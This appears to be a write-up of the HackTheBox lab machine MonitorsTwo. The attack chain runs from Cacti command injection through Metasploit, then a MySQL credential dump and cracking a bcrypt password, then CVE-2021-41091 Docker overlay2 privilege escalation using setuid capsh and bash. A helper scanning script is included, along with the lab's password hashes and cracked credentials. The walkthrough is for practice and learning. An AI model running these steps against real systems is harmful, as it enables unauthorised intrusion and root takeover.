Basic information

Port scan

Only ports 22 and 80 are open:

$ nmap -sC -sV -Pn 10.10.11.211
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 13:29 CST
Nmap scan report for 10.10.11.211
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Login to Cacti
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.55 seconds

Port 80

The site is Cacti 1.2.22:

cacti

Searching for this version turns up the following:

Alternatively, use the Metasploit module directly:

msf6 > use exploit/linux/http/cacti_unauthenticated_cmd_injection

This gives a shell as www-data, which turns out to be inside a container:

/entrypoint.sh

entrypoint.sh sits in the filesystem root; reading it gives the MySQL credentials:

mysql

Two bcrypt hashes come out of the MySQL user_auth table; cracking them with john recovers marcus's password:

mysql --host=db --user=root --password=root cacti -e "show tables"
mysql --host=db --user=root --password=root cacti -e "select * from user_auth"

admin:$2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC
marcus:$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

marcus : funkymonkey

user flag

Log in over SSH as marcus to get the user flag:

The login also shows a "you have mail" notice; the mail describes three vulnerabilities:

cat /var/mail/marcus

CVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.

CVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.

CVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.

Privilege escalation information

Based on the mail, privilege escalation is expected to go through CVE-2021-41091:

Per the description, an unprivileged user on the host can traverse into a container's root filesystem under the Docker data directory and execute a program there. Since the container shares the host's uid space, a root-owned setuid binary inside the container is also a root-owned setuid binary on the host, so executing it from the host grants host root.

Docker

Back in the container as www-data, checking for setuid binaries turns up /sbin/capsh:

docker root

Use the setuid capsh to become root inside the container:

Then set the setuid bit on bash inside the container:

/sbin/capsh --gid=0 --uid=0 --
chmod +s /bin/bash

Privilege escalation & root flag

Back as marcus, inspect the mounts with findmnt to find the container's overlay2 layer directory on the host, then run the setuid bash from that layer directly with -p (so bash keeps the effective uid) to get root:

marcus@monitorstwo:~$ findmnt

/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/

/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/diff/bin/bash -p
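The two manual steps above (finding setuid binaries inside the container, then locating and executing one of them from the host through the overlay2 layer) can be scripted. The following is an added example, not code from the original writeup, Cacti or Docker. It assumes the default Docker data root /var/lib/docker; the function names are mine, and the directory tree used to check it is constructed.

```bash
#!/bin/sh
# Added example (not from the original writeup). Two checks that cover both
# steps of the escalation:
#   1. inside the container: list setuid binaries (the writeup found /sbin/capsh);
#   2. on the host: test whether the Docker data root is traversable by the
#      current user (the CVE-2021-41091 condition) and list setuid files in the
#      overlay2 layers reachable from there, without needing findmnt or root.
# Paths default to the standard /var/lib/docker (an assumption).

# Print regular files with the setuid bit beneath $1. Inside a container call
# it with "/"; on the host call it with an overlay2 layer directory.
find_setuid_files() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# Return 0 if $1 (default: the Docker data root) exists and has the execute
# (traverse) bit for the caller. Docker >= 20.10.9 creates it as 0710 root:root,
# so for an unprivileged user this should fail on a patched host.
docker_root_traversable() {
    dir="${1:-/var/lib/docker}"
    [ -d "$dir" ] && [ -x "$dir" ]
}

# Walk every overlay2 layer's diff/ directory under $1 and report setuid files.
# On an unpatched host this finds, for example, the /bin/bash that was chmod +s'd
# inside the container, which can then be run as <layer>/diff/bin/bash -p.
scan_overlay_layers() {
    root="${1:-/var/lib/docker/overlay2}"
    for layer in "$root"/*/diff; do
        [ -d "$layer" ] || continue
        find_setuid_files "$layer"
    done
}

# Usage: ./scan.sh --container   (inside the container)
#        ./scan.sh --host        (as an unprivileged host user)
case "${1:-}" in
    --container) find_setuid_files / ;;
    --host)
        if docker_root_traversable; then
            echo "[!] /var/lib/docker is traversable by $(id -un)"
        fi
        scan_overlay_layers ;;
esac
```

Running it with --host as marcus would print the overlay2 path of the setuid bash planted in the previous step; the same scan on a patched Docker reports nothing because the data root is not traversable. When auditing a real host, add `-user root` to the find so that setuid files owned by unprivileged users (harmless on the host) are not reported.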

shadow

root:$6$KQUOT7rGEpEUTjFc$hA2mxdKhpH7RQ3g5ZGjzkPrRpq1jCqmiZY9SgqaoTb1BI6APMo14Ed/Ptbfnf5MAkCbBbHEbRqwzPc301fuat1:19366:0:99999:7:::
marcus:$6$mobk0CS45kj4tF6o$bOq9Svoa9Q9AbmfIz2K210JOwv1wS3AFhaCsYkewZleSwBysUj/a57p0YhRvi40A6cfkDFHfnuOP3useo.ms/1:19366:0:99999:7:::
